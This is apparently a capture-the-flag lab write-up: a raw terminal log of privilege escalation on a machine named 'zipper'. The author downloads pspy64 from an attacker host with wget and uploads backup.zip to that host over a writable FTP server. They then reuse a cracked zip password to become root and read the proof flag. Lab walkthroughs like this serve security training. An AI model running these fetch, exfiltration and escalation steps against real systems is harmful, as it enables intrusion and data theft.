Priv Esc
Last updated
Last updated
www-data@zipper:/home$ cat /etc/crontabwww-data@zipper:/dev/shm$ wget 192.168.45.168/pspy
--2024-09-09 11:48:04-- http://192.168.45.168/pspy
Connecting to 192.168.45.168:80... connected.
HTTP request sent, awaiting response... 404 File not found
2024-09-09 11:48:04 ERROR 404: File not found.
www-data@zipper:/dev/shm$ wget 192.168.45.168/pspy64
--2024-09-09 11:48:08-- http://192.168.45.168/pspy64
Connecting to 192.168.45.168:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===================>] 2.96M 6.36MB/s in 0.5s
2024-09-09 11:48:08 (6.36 MB/s) - ‘pspy64’ saved [3104768/3104768]
www-data@zipper:/dev/shm$ chmod +x pspy64
******************www-data@zipper:/dev/shm$ cd /opt
www-data@zipper:/opt$ ls
backup.sh backups
www-data@zipper:/opt$ cd backups
www-data@zipper:/opt/backups$ ls
backup.log backup.zip$ python -m pyftpdlib --write -p 21www-data@zipper:/opt/backups$ ftp 192.168.45.168
Connected to 192.168.45.168.
220 pyftpdlib 1.5.10 ready.
Name (192.168.45.168:www-data): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put backup.zip
local: backup.zip remote: backup.zip
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
1538 bytes sent in 0.00 secs (81.4862 MB/s)
ftp> exit
221 Goodbye.
Ran pspy again
WildCardsGoingWildadot@kali:~/oscp/pg/zipper/privesc$ cat enox.zip
/root/secret Nothing special about the backups so just tried to su as root with the zip password
www-data@zipper:/dev/shm$ su root
Password: WildCardsGoingWild
root@zipper:/dev/shm# whoami
root
root@zipper:/dev/shm# cat /root/proof.txt
a244b4ca5153c45dc9f92eee77695486
root@zipper:/dev/shm# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:bf:47:1a brd ff:ff:ff:ff:ff:ff
inet 192.168.185.229/24 brd 192.168.185.255 scope global ens160
valid_lft forever preferred_lft forever
